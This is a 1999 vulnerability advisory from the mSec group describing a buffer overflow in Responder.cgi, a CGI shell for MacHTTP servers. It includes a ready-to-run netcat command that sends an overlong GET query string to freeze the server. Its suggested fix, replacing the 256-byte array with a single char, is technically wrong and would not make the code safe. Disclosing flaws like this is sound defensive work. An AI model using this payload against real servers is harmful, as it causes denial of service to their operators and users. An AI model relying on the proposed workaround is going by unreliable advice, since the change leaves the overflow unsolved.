___________________________ / / / /\ ______/ ____/ ____/ / / / / / / ____/ / / /____ / ____/ / / / / / / / / / / /_/_/_/________/________/________/ / \_____\________\________\________\/ / . ../Macintosh Security/.. . / /________________________________/ Presents:
Responder.cgi Vulnerability
Written by Epic, A Member of mSec
<epic@msec.net>
Released 4/9/99
Responder.cgi, a public domain 'C' shell for MacHTTP CGI Servers contains a buffer overflow that when exploited, will cause the server it is run on to freeze. You are at risk if your responder.cgi file contains the line of code:
char PostArg_Search[256];
which is the QUERY_STRING, Since it only allows upto 256 characters after ?, the server will crash if 257+ characters are requested.
Exploit Example: (nc is netcat from avian.org)
$ echo "GET
/cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc
machttp-server.com 80
Possible Workaround:
Remove responder.cgi from your /cgi-bin/ or change
char PostArg_Search[256]; to
char PostArg_Search;